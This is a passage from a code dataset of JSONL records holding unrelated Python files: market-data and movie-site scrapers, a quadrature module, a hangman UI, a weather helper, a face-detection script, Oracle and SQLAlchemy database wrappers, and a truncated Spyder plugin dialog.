name='index'),\n url(r'^like/$', views.like, name='like'),\n url(r'^dislike/$', views.dislike, name='dislike'),\n)\n\n","sub_path":"discover/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"504129982","text":"from requests_html import HTMLSession\nimport os\nfrom os import path\nimport json\nfrom bs4 import BeautifulSoup as bs\nimport xlrd\nfrom datetime import datetime\n# s = \"15-Jul-2020\"\n# f = \"%d-%b-%Y\"\n# out = datetime.strptime(date_string, \"%d/%m/%Y\").strftime(\"%d-%b-%Y\")\n# print(out)\n\n\ndef fetch(url, filename):\n try:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.45',\n 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-US,en;q=0.9'}\n\n # initialize the session\n session = HTMLSession()\n\n try:\n # make the HTTP request and retrieve response\n response = session.get(url)\n if(response.status_code == 200):\n # execute Javascript\n response.html.render(timeout=200000)\n\n # construct the soup parser\n soup = bs(response.html.html, \"html.parser\")\n print('Data Fetched from this ' + url)\n\n try:\n scrap(soup, filename)\n except Exception as e:\n print('Error - Data Scraping Failed ' +\n url + ' {}'.format(e))\n else:\n print(url)\n print('Site is not responding or internet is not availabe {}'.format(\n response.status_code))\n\n except Exception as e:\n print('Error - fetch Failed for ' + url + ' {}'.format(e))\n except Exception as e:\n print('Error - fetcher Failed for ' + url + ' {}'.format(e))\n\n\ndef file_fetch(url, filename):\n try:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Edg/83.0.478.45',\n 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'en-US,en;q=0.9'}\n\n # initialize the session\n session = HTMLSession()\n\n try:\n # make the HTTP request and retrieve response\n response = session.get(url)\n if(response.status_code == 200):\n print('Data Fetched from this ' + url)\n try:\n scrap(response.content, filename)\n except Exception as e:\n print('Error - Data Scraping Failed ' +\n url + ' {}'.format(e))\n else:\n print(url)\n print(url + ' is not responding or internet is not availabe {}'.format(\n response.status_code))\n\n except Exception as e:\n print('Error - fetch Failed for ' + url + ' {}'.format(e))\n except Exception as e:\n print('Error - fetcher Failed for ' + url + ' {}'.format(e))\n\n\ndef scrap(soup, fileName):\n\n directory = \"./temp_data\"\n if(os.path.exists(directory) != True):\n os.mkdir(directory)\n\n if(fileName == 'cdsl-FII-DD'):\n rows = soup.findAll('tr') # Extract and return first occurrence of tr\n\n td0 = rows[0].find_all('td')\n td1 = rows[1].find_all('td')\n td14 = rows[14].find_all('td')\n\n # for td in td0:\n # print(td.get_text())\n # for td in td1:\n # print(td.get_text())\n note = td14[0].get_text()\n note = note.replace(\"\\n\", \"\").replace(\" \", \"\").replace(\n \"\\r\", \"\").replace(\" \", \"\").strip()\n\n data1 = {\"Date\": datetime.strptime(td1[0].get_text(), \"%d-%b-%Y\").strftime(\"%d-%b-%Y\"),\n \"Equity\": {\"Stock Exchange\":\n {\"Gross Purchases (Rs Crore)\": td1[3].get_text(),\n \"Gross Sales (Rs Crore)\": td1[4].get_text(),\n \"Net Investment (Rs Crore)\": td1[5].get_text()}},\n \"Note\": note}\n\n # print(data1)\n\n with open(directory+'/'+fileName+'-table1.json', 'w') as f:\n json.dump(data1, f)\n\n ##\n # Second table\n ##\n\n td0 = rows[15].find_all('td')\n td1 = rows[16].find_all('td')\n td2 = rows[17].find_all('td')\n td3 = rows[18].find_all('td')\n td4 = rows[19].find_all('td')\n td5 = rows[20].find_all('td')\n td6 = rows[21].find_all('td')\n td7 = rows[22].find_all('td')\n\n # print('------------------------------')\n # for td in td0:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td1:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td2:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td3:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td4:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td5:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td6:\n # print(td.get_text())\n # print('------------------------------')\n # for td in td7:\n # print(td.get_text())\n # print('------------------------------')\n\n note = td7[0].get_text()\n note = note.replace(\"\\n\", \"\").replace(\n \"\\r\", \"\").replace(\" \", \"\").strip()\n\n data2 = {\"Date\": datetime.strptime(td2[0].get_text(), \"%d-%b-%Y\").strftime(\"%d-%b-%Y\"),\n \"Buy\": {\"No of contract\":\n {\"Index Futures\": td2[2].get_text(),\n \"Index Options\": td3[2].get_text(),\n \"Stock Futures\": td4[2].get_text(),\n \"Stock Options\": td5[2].get_text(),\n \"Interest Rate Futures\": td6[2].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[3].get_text(),\n \"Index Options\": td3[3].get_text(),\n \"Stock Futures\": td4[3].get_text(),\n \"Stock Options\": td5[3].get_text(),\n \"Interest Rate Futures\": td6[3].get_text()\n }},\n \"Sell\": {\"No of contract\":\n {\"Index Futures\": td2[4].get_text(),\n \"Index Options\": td3[4].get_text(),\n \"Stock Futures\": td4[4].get_text(),\n \"Stock Options\": td5[4].get_text(),\n \"Interest Rate Futures\": td6[4].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[5].get_text(),\n \"Index Options\": td3[5].get_text(),\n \"Stock Futures\": td4[5].get_text(),\n \"Stock Options\": td5[5].get_text(),\n \"Interest Rate Futures\": td6[5].get_text()\n }},\n \"Open Interest at the end of the date\": {\"No of contract\":\n {\"Index Futures\": td2[6].get_text(),\n \"Index Options\": td3[6].get_text(),\n \"Stock Futures\": td4[6].get_text(),\n \"Stock Options\": td5[6].get_text(),\n \"Interest Rate Futures\": td6[6].get_text()\n },\n \"Amount in Crore\":\n {\"Index Futures\": td2[7].get_text(),\n \"Index Options\": td3[7].get_text(),\n \"Stock Futures\": td4[7].get_text(),\n \"Stock Options\": td5[7].get_text(),\n \"Interest Rate Futures\": td6[7].get_text()\n }},\n \"Note\": note}\n # prin(data2)\n with open(directory+'/'+fileName+'-table2.json', 'w') as f:\n json.dump(data2, f)\n\n if(fileName == 'bse-equity-CW-TO'):\n # Extract and return first occurrence of tr\n trs = soup.find(id='ContentPlaceHolder1_offTblBdyDII').find_all('tr')\n tds1 = trs[1]\n tdArray1 = []\n for td in tds1:\n try:\n tdArray1.append(td.get_text())\n except:\n pass\n trs = soup.find(id='offTblBdy').find_all('tr')\n tds2 = trs[0]\n tdArray2 = []\n for td in tds2:\n try:\n tdArray2.append(td.get_text())\n except:\n pass\n data1 = {\n \"Category\": tdArray1[0],\n \"Date\": datetime.strptime(tdArray1[1], \"%d/%m/%Y\").strftime(\"%d-%b-%Y\"),\n \"Buy Value\": tdArray1[2],\n \"Sale Value\": tdArray1[3],\n \"Net Value\": tdArray1[4],\n }\n with open(directory+'/'+fileName+'-table1.json', 'w') as f:\n json.dump(data1, f)\n\n data2 = {\n \"Date\": datetime.strptime(tdArray2[0], \"%d/%m/%Y\").strftime(\"%d-%b-%Y\"),\n \"Clients\": {\n \"Buy\": tdArray2[1],\n \"Sales\": tdArray2[2],\n \"Net\": tdArray2[3]\n },\n \"NRI\": {\n \"Buy\": tdArray2[4],\n \"Sales\": tdArray2[5],\n \"Net\": tdArray2[6]\n },\n \"Proprietary\": {\n \"Buy\": tdArray2[7],\n \"Sales\": tdArray2[8],\n \"Net\": tdArray2[9]\n }\n }\n # print(data2)\n with open(directory+'/'+fileName+'-table2.json', 'w') as f:\n json.dump(data2, f)\n\n if(fileName == 'equity-CM-CW-turnover'):\n with open(directory+'/'+fileName+'.xls', 'wb') as f:\n f.write(soup)\n\n # To open Workbook\n wb = xlrd.open_workbook(directory+'/'+fileName+'.xls')\n sheet = wb.sheet_by_index(0)\n\n # For row 0 and colom 0\n # print(sheet.cell_value(0, 0))\n if(sheet.cell_value(3, 1) == \"BNK\"):\n row_bnk = 3\n if(sheet.cell_value(4, 1) == \"DFI\"):\n row_dfi = 4\n else:\n row_dfi = None\n if(sheet.cell_value(4, 1) == \"PRO-TRADES\"):\n row_pro = 4\n if(sheet.cell_value(5, 1) == \"PRO-TRADES\"):\n row_pro = 5\n if(sheet.cell_value(5, 1) == \"OTHERS\"):\n row_other = 5\n if(sheet.cell_value(6, 1) == \"OTHERS\"):\n row_other = 6\n\n data = {\n \"Date\": datetime.strptime(sheet.cell_value(3, 0), \"%d-%b-%y\").strftime(\"%d-%b-%Y\"),\n \"Pro Trades\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_pro, 2),\n \"Sell Value (Rs. in Crores)\": sheet.cell_value(row_pro, 3),\n },\n \"Others Trades\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_other, 2),\n \"Sell Value (Rs. in Crores)\": sheet.cell_value(row_other, 3),\n },\n \"BNK&DFI\": {\n \"Buy Value (Rs. in Crores)\": sheet.cell_value(row_bnk, 2) + (sheet.cell_value(row_dfi, 2) if(row_dfi != None) else 0),\n \"Sell Value (Rs. in Crores)\": sheet.cell_value(row_bnk, 3) + (sheet.cell_value(row_dfi, 3) if(row_dfi != None) else 0),\n },\n }\n # print(data)\n\n with open(directory+'/'+fileName+'.json', 'w') as f:\n json.dump(data, f)\n","sub_path":"fetcher_dir/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":11864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"305346521","text":"import requests\nfrom django.http import JsonResponse\n\n\n# Create your views here.\n\n\n# 正在热映\ndef get_movieOnInfoList(request):\n url = 'http://m.maoyan.com/ajax/movieOnInfoList?token='\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n\n# 即将热映\ndef get_comingList(request):\n url = 'http://m.maoyan.com/ajax/comingList?ci=73&token=&limit=10'\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n\n# 获取影城信息\ndef get_cinemaList(request):\n url = 'http://m.maoyan.com/ajax/cinemaList?day=2019-10-31&offset=0&limit=20&districtId=-1&lineId=-1&hallType=-1&brandId=-1&serviceId=-1&areaId=-1&stationId=-1&item=&updateShowDay=true&reqId=1572519440844&cityId=73'\n headers = {\n 'Referer': 'http://m.maoyan.com',\n 'User-Agent': 'User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Mobile Safari/537.36'\n }\n\n res = requests.get(url, headers=headers).json()\n return JsonResponse(res)\n\n# print(get_movieOnInfoList())\n#\n# print('*'*100)\n# print(get_comingList())\n# print('*'*100)\n# print(get_cinemaList())\n","sub_path":"maoyan(vue+django)/maoyan-Django/maoyan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"238613639","text":"#!/usr/bin/python\nimport PolyMethod as polmeth\nimport IndexSets as isets\nimport numpy as np\n\n\"\"\" \n Tensor and sparse grid integration points and weights\n\"\"\"\ndef SparseGrid(Parameters, level, growth_rule):\n \n # Get the sparse indices\n dimensions = len(Parameters)\n sparse_index, a , sg_set = isets.sparse_grid_index_set(dimensions, level, growth_rule)\n \n # Compute the corresponding Gauss quadrature points and weights\n rows = len(sparse_index)\n \n # Get this into an array\n orders = np.zeros((rows, dimensions))\n points_store = []\n weights_store = []\n \n \n # Ok, now we have to correct for the weights, depending on the right and left\n # bounds of the individual parameters. I'm hardcoding this for Legendre for\n # the moment!\n factor = 0\n for k in range(0, dimensions):\n factor = (Parameters[k].upper_bound - Parameters[k].lower_bound) + factor\n \n \n for i in range(0, rows):\n \n # loop through the dimensions\n for j in range(0, dimensions):\n orders[i,j] = np.array(sparse_index[i][j])\n \n # points and weights for each order~\n points, weights = polmeth.getGaussianQuadrature(Parameters, orders[i,:])\n \n # Multiply weights by constant 'a':\n weights = factor * weights * a[i]\n \n # Now store point sets ---> scratch this, use append instead!!!!\n for k in range(0, len(points)):\n #print points[k,:]\n points_store = np.append(points_store, points[k,:], axis=0)\n weights_store = np.append(weights_store, weights[k])\n \n dims1 = int( len(points_store) / dimensions )\n points_store = np.reshape(points_store, ( dims1, dimensions ) ) \n \n return points_store, weights_store\n \ndef TensorGrid(Parameters, orders):\n \n # Call the gaussian quadrature routine\n points, weights = polmeth.getGaussianQuadrature(Parameters, orders)\n \n # Get the weight factor:\n dimensions = len(Parameters)\n factor = 0\n for k in range(0, dimensions):\n factor = (Parameters[k].upper_bound - Parameters[k].lower_bound) + factor\n \n # Multiply by the factor\n weights = weights * factor\n \n return points, weights","sub_path":"codes/Integration.py","file_name":"Integration.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"527597465","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hatch', '0006_anchor_scraped'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anchor',\n name='ip',\n field=models.GenericIPAddressField(default='127.0.0.1'),\n ),\n ]\n","sub_path":"neuron_django/hatch/migrations/0007_anchor_ip.py","file_name":"0007_anchor_ip.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"25666014","text":"\"\"\"\n @author: Matko Gabriel\n @email: ytgabi98@gmail.com\n @date: 1/30/2018 11:37\n\"\"\"\nclass UI(object):\n\n @staticmethod\n def printMenu(*args):\n \"\"\"\n Prints the menu of the application\n \"\"\"\n print(\"\\033[96mAvailable commands:\\033[0m\")\n print(\"\\033[91m add \\033[93m<sentence>\\033[0m\")\n print(\"\\033[91m start\\033[0m\")\n print(\"\\033[91m exit\\033[0m\")\n print(\"\\033[91m help\\033[0m\")\n\n\n @staticmethod\n def getCommand():\n \"\"\"\n Reads a command and it's arguments from console\n :return: a tuple with the command and it's arguments\n example : (\"add\", [\"sentence\", \"for\", \"hangman\"])\n Raises Exception when the command does not exist\n or the arguments are bad\n or the words of the sentences have less than 3 characters\n \"\"\"\n cmd = input(\"\\033[32m>>> \\033[0m\").lower()\n\n cmd = cmd.split()\n\n if cmd[0] not in [\"add\", \"start\", \"exit\", \"help\"]:\n raise Exception(\"Command error!\")\n\n\n if cmd[0] == \"add\" and cmd[1:] == []:\n raise Exception(\"Argument error!\")\n\n if cmd[0] == \"add\":\n for el in cmd[1:]:\n if len(el) < 3:\n raise Exception(\"Invalid input. Words need to have at least 3 characters!\\n The bad word is '\" + el + \"'.\")\n\n return cmd[0], cmd[1:]\n\n @staticmethod\n def printException(ex):\n \"\"\"\n Prints an exception with format\n :param ex: exception to be printed\n :return: nothing\n \"\"\"\n print(\"\\n \\033[91m\", ex, \"\\033[0m\\n\")\n\n @staticmethod\n def getChar():\n \"\"\"\n Reads a character from the console for the hangman game\n :return: the character introduced by the user\n Raises ValueError when user introduces more than 1 characters\n or when the input is not a character\n \"\"\"\n char = input(\"\\033[32m>>> \\033[0m\").lower()\n if len(char) != 1:\n raise ValueError(\"You should insert only a character at a time!\")\n\n if not char.isalpha():\n raise ValueError(\"Please introduce a character!\")\n\n return char\n","sub_path":"FinalExam/ui/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"360810631","text":"import datetime\nimport string\nimport time\n\nimport astral\nimport pywapi\n\nimport config\n\nclass SimpleWeather(object):\n def __init__(self):\n self.celcius = None\n self.is_sunny = 0\n self.is_rainy = 0\n self.is_foggy = 0\n self.is_cloudy = 0\n self.lightning = 0\n self.is_snowy = 0\n\n'''\nMostly Cloudy\nPartly Cloudy\nOvercast\nFair\nFog/Mist\nA Few Clouds\nLight Rain\nHaze\nDrizzle\nBreezy\nLight Snow\nUnknown Precip\n'''\ndef parse_weather_modifier(modifier):\n if modifier in ['very', 'mostly', 'high', 'heavy']:\n return 0.75\n elif modifier in ['partly', 'little', 'light', 'low']:\n return 0.25\n else:\n return 0.5\n\n\ndef parse_weather(weather_str):\n weather = SimpleWeather()\n weather_str_list = weather_str.lower().replace('/', ' ').split()\n last_word = None\n for word in weather_str_list:\n if 'sun' in word or word == 'fair':\n weather.is_sunny = parse_weather_modifier(last_word)\n elif 'cloud' in word:\n weather.is_cloudy = parse_weather_modifier(last_word)\n elif word == 'overcast':\n weather.is_cloudy = min(parse_weather_modifier(last_word) * 1.25, 1.0)\n elif 'rain' in word:\n weather.is_rainy = parse_weather_modifier(last_word)\n elif 'fog' in word or 'mist' in word:\n weather.is_foggy = parse_weather_modifier(last_word)\n elif 'snow' in word:\n weather.is_snowy = parse_weather_modifier(last_word)\n last_word = word\n return weather\n\ndef get_weather(location_id='KSJC', weather_source='noaa'):\n if config.config['debug']:\n current_weather = parse_weather('cloudy rainy')\n current_weather.celcius = 30.0\n return current_weather\n\n if weather_source == 'noaa':\n noaa_result = pywapi.get_weather_from_noaa(location_id)\n current_weather = parse_weather(string.lower(noaa_result['weather']))\n current_weather.celcius = float(noaa_result['temp_c'])\n elif weather_source == 'yahoo':\n yahoo_result = pywapi.get_weather_from_yahoo(location_id)\n current_weather = parse_weather(string.lower(yahoo_result['condition']['text']))\n current_weather.celcius = float(yahoo_result['condition']['temp'])\n elif weather_source == 'weather_com':\n weather_com_result = pywapi.get_weather_from_weather_com(location_id)\n current_weather = parse_weather(string.lower(weather_com_result['current_conditions']['text']))\n current_weather.celcius = float(weather_com_result['current_conditions']['temperature'])\n return current_weather\n\ndef get_seconds(local_time=None):\n if local_time is None:\n local_time = time.localtime()\n seconds = local_time.tm_hour * 3600 + local_time.tm_min * 60 + local_time.tm_sec\n return float(seconds)\n\ndef get_sun_seconds(time):\n seconds = time.hour * 3600 + time.minute * 60 + time.second\n return float(seconds)\n\ndef get_sun_position(now=None, sunrise=None, sunset=None):\n if now is None:\n now = get_seconds(time.localtime())\n if sunrise is None:\n sunrise = get_sun_info()[0]\n if sunset is None:\n sunset = get_sun_info()[1]\n sun_position = (now - sunrise) / (sunset - sunrise)\n if sun_position < 0 or sun_position > 1:\n return None\n else:\n return sun_position\n\ndef get_moon_position(now=None, sunset=None, sunrise=None):\n if now is None:\n now = get_seconds(time.localtime())\n if sunset is None:\n sunset = float(get_sun_info()[1])\n if sunrise is None:\n sunrise = float(get_sun_info()[0])\n if now < sunrise:\n moon_position = (now + (86400 - sunset)) / (sunrise + (86400 - sunset))\n else:\n moon_position = (now - sunset) / (sunrise + (86400 - sunset))\n if moon_position < 0 or moon_position > 1:\n return None\n else:\n return moon_position\n\ndef get_sun_info():\n sun_info = astral.Astral()\n location = sun_info['San Francisco']\n timezone = location.timezone\n d = datetime.date.today()\n sun = location.sun(local=True, date=d)\n sunrise = get_sun_seconds(sun['sunrise'])\n sunset = get_sun_seconds(sun['sunset'])\n return float(sunrise), float(sunset)\n\ndef get_moon_info():\n moonset, moonrise = get_sun_info()\n return moonrise, moonset\n","sub_path":"server/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"104221973","text":"from PIL import Image, ImageFile\nimport face_recognition\nimport glob\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\nphoto_limit = -1 # set -1 for no limit\n\nid_stats_f = open(\"data/identity_face_stats.txt\", \"w\")\n\nidentity_list = glob.glob(\"../dataset/*/*/*\")\n\nphotos_by_faces = {}\nfaces_by_dim = {}\nface_ratios = {}\nidentity_ratios = {}\nidentity_avg_faces = {}\n\nphoto_counter = 0\n\n# Analyze faces per identity\nfor identity in identity_list:\n if photo_limit != -1 and photo_counter > photo_limit:\n break\n\n print(identity)\n file_list = glob.glob(identity + \"/*.jpg\")\n\n if len(file_list) == 0:\n continue\n\n images_with_faces = 0\n faces = 0\n\n # Run face detector on each image for identity\n for file in file_list:\n image = face_recognition.load_image_file(file)\n img_w, img_h, img_dim = image.shape\n\n mem_c = 0\n while True:\n if mem_c == 3:\n break\n try:\n face_locations = face_recognition.face_locations(image, number_of_times_to_upsample=0, model=\"cnn\")\n break\n except RuntimeError:\n sleep(5)\n print(\"Runtime Error: Out of memory\")\n mem_c += 1\n if mem_c == 3:\n continue\n else:\n photo_counter += 1\n\n # Check multiple faces per image\n if len(face_locations) > 0:\n images_with_faces += 1\n faces += len(face_locations)\n\n if len(face_locations) not in photos_by_faces:\n photos_by_faces[len(face_locations)] = 1\n else:\n photos_by_faces[len(face_locations)] += 1\n\n for face_location in face_locations:\n p1_y, p1_x, p2_y, p2_x = face_location\n w = abs(int(p1_x - p2_x))\n h = abs(int(p1_y - p2_y))\n\n if (w,h) not in faces_by_dim:\n faces_by_dim[(w,h)] = 1\n else:\n faces_by_dim[(w,h)] += 1\n\n face_to_img = (round(1.0 * w / img_w, 2), round(1.0 * h / img_h, 2))\n if face_to_img not in face_ratios:\n face_ratios[face_to_img] = 1\n else:\n face_ratios[face_to_img] += 1\n\n ratio = round(1.0 * images_with_faces / len(file_list), 2) # fraction of images that contain faces\n avg_faces = round(1.0 * faces / len(file_list), 2) # average number of faces per image\n\n if ratio not in identity_ratios:\n identity_ratios[ratio] = 1\n else:\n identity_ratios[ratio] += 1\n\n if avg_faces not in identity_avg_faces:\n identity_avg_faces[avg_faces] = 1\n else:\n identity_avg_faces[avg_faces] += 1\n\n print >> id_stats_f, (identity + \" (\" + str(ratio) + \", \" + str(avg_faces) + \")\")\n\nid_stats_f.close()\n\n# Print collected data\nf = open(\"data/face_results.txt\", \"w\")\nprint >> f, photos_by_faces\nprint >> f, faces_by_dim\nprint >> f, face_ratios\nprint >> f, identity_ratios\nprint >> f, identity_avg_faces\nf.close()","sub_path":"analysis/face_analysis.py","file_name":"face_analysis.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"393226724","text":"import cx_Oracle\nimport logging\n\nlogging_level = logging.DEBUG\nlogging.basicConfig(level=logging_level,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='[%Y-%m-%d %H:%M:%S]')\n\nclass dbtest():\n _connect = None\n _SHOW_SQL = None\n __commit = None\n __SQL = None\n\n def _init(self):\n if self._connect is None:\n self._connect = cx_Oracle.connect('dev/123456@remot/ORCL')\n else:\n raise Exception(\"dbs.__connect only use once, pleas clear and new dbs!\")\n\n def _exec(self, sql):\n pass\n\n def _finish(self):\n self.__SQL = None\n if self._connect and self.__commit:\n self._connect.commit()\n if self._connect:\n self._connect.close()\n\n def call(self, sql):\n self._init()\n try:\n return self._exec(sql)\n except:\n if self.__SQL:\n self._print('[ERROR]'+self.__SQL)\n if self._connect and self.__commit:\n try:\n self._connect.rollback();\n finally:\n pass\n raise\n finally:\n self._finish()\n\n def _print(self, sql):\n logging.debug(\"[\" + self.__class__.__name__ + \" execSQL] \" + sql)\n pass\n\n def _fetchall(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n return cursor.fetchall()\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _fetchone(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n return cursor.fetchone()\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _update(self, sql):\n self.__SQL = sql\n cursor = None\n try:\n cursor = self._connect.cursor()\n cursor.execute(self.__SQL)\n count = cursor.rowcount\n self.__commit = True\n return count\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n def _calldata(self, cursor):\n pass\n def _callproc(self, proc):\n cursor = None\n try:\n cursor = self._connect.cursor()\n data = self._calldata(cursor)\n self.__SQL = proc + str(data)\n cursor.callproc(proc, data)\n for i in range(0, len(data)):\n if isinstance(data[i], cx_Oracle.CURSOR):\n try:\n data[i] = [x for x in data[i].getvalue()]\n except:\n logging.error(\"[\" + self.__class__.__name__ + \" ERROR] OUT Cursor not open in PL/SQL \" + self.__SQL)\n data[i] = []\n pass\n self.__commit = True\n return data\n finally:\n if self._SHOW_SQL:\n self._print(self.__SQL)\n if cursor:\n cursor.close()\n\n\n\n","sub_path":"start/code/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"60157426","text":"# -*- coding: utf-8 -*-\nimport os\nimport traceback\nfrom .utils import tprint_error\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom .utils import CrawlerUtil\nfrom .mysql_alchemy import HqSession\n\n# const\nDB_EXCEPTION = -1\n\n\n# databases\nCRAWLER_BOOKING_BASE = declarative_base(name='crawler_booking')\nCRAWLER_DIDA_BASE = declarative_base(name='crawler_dida')\nCRAWLER_QYER_BASE = declarative_base(name='crawler_qyer')\nCRAWLER_MAFENGWO_BASE = declarative_base(name='crawler_mafengwo')\nCRAWLER_META = declarative_base(name='crawler_meta')\nCRAWLER_CTRIP_BASE = declarative_base(name='crawler_ctrip')\n\n\nclass CrawlerBaseDb(object):\n \"\"\"\n Crawler base database\n \"\"\"\n logger = CrawlerUtil.get_crawler_logger()\n\n def __init__(self, db):\n self.db = db\n self.session = None\n self.engine = None\n self.data_dir = CrawlerUtil.get_crawler_data_dir()\n\n def create_all_tables(self, basecls):\n try:\n basecls.metadata.create_all(self.engine)\n self.session.commit()\n return True\n except SQLAlchemyError:\n self.logger.error(traceback.format_exc())\n return False\n\n # only clean dir\n def clean_data_files(self):\n try:\n file_list = os.listdir(self.data_dir)\n for f in file_list:\n file_path = os.path.join(self.data_dir, f)\n if os.path.isfile(file_path):\n pass\n # os.remove(file_path)\n elif os.path.isdir(file_path):\n pass\n # shutil.rmtree(file_path, True)\n return True\n except OSError:\n self.logger(traceback.format_exc())\n return False\n\n @classmethod\n def get_db(cls, db):\n try:\n database = CrawlerBaseDb(db)\n database.session, database.engine = HqSession.get_db_session(db)\n return database\n except SQLAlchemyError:\n tprint_error(traceback.format_exc())\n cls.logger.error(\"fail to create database objects: \\n{error}\\n\"\n .format(error=traceback.format_exc()))\n return None\n\n @classmethod\n def get_wild_session(cls, db):\n return HqSession.get_wild_session(db)\n\n @classmethod\n def close_wild_session(cls, sess):\n HqSession.close_wild_session(sess)\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"crawlers/crawlers/common/mysql_adapter.py","file_name":"mysql_adapter.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"293331846","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2013 Spyder Project Contributors\n# Licensed under the terms of the MIT License\n# (see LICENSE.txt for details)\n\"\"\"\nFunctionality for asking the user to specify the test configuration.\n\nThe main entry point is `ask_for_config()`.\n\"\"\"\n\n# Standard library imports\nfrom collections import namedtuple\nimport os.path as osp\n\n# Third party imports\nfrom qtpy.compat import getexistingdirectory\nfrom qtpy.QtWidgets import (QApplication, QDialog, QDialogButtonBox, QGroupBox,\n QHBoxLayout, QLabel, QLineEdit, QPushButton,\n QRadioButton, QVBoxLayout)\nfrom spyder.config.base import get_translation\nfrom spyder.py3compat import getcwd, to_text_string\nfrom spyder.utils import icon_manager as ima\n\ntry:\n _ = get_translation(\"unittest\", dirname=\"spyder_unittest\")\nexcept KeyError as error:\n import gettext\n _ = gettext.gettext\n\nConfig = namedtuple('Config', ['framework', 'wdir'])\nConfig.__new__.__defaults__ = (None, '')\n\n\nclass ConfigDialog(QDialog):\n \"\"\"\n Dialog window for specifying test configuration.\n\n The window contains two radio buttons (for 'py,test' and 'nose'),\n a line edit box for specifying the working directory, a button to\n use a file browser for selecting the directory, and OK and Cancel\n buttons. Initially, neither radio button is selected and the OK\n button is disabled. Selecting a radio button enabled the OK\n button.\n \"\"\"\n\n def __init__(self, config, parent=None):\n \"\"\"\n Construct a dialog window.\n\n Parameters\n ----------\n config : Config\n Initial configuration\n parent : QWidget\n \"\"\"\n super(ConfigDialog, self).__init__(parent)\n self.setWindowTitle(_('Configure tests'))\n layout = QVBoxLayout(self)\n\n framework_groupbox = QGroupBox(_('Test framework'), self)\n framework_layout = QVBoxLayout(framework_groupbox)\n self.pytest_button = QRadioButton('py.test', framework_groupbox)\n framework_layout.addWidget(self.pytest_button)\n self.nose_button = QRadioButton('nose', framework_groupbox)\n framework_layout.addWidget(self.nose_button)\n layout.addWidget(framework_groupbox)\n\n layout.addSpacing(10)\n\n wdir_label = QLabel(_('Directory from which to run tests'))\n layout.addWidget(wdir_label)\n wdir_layout = QHBoxLayout()\n self.wdir_lineedit = QLineEdit(self)\n 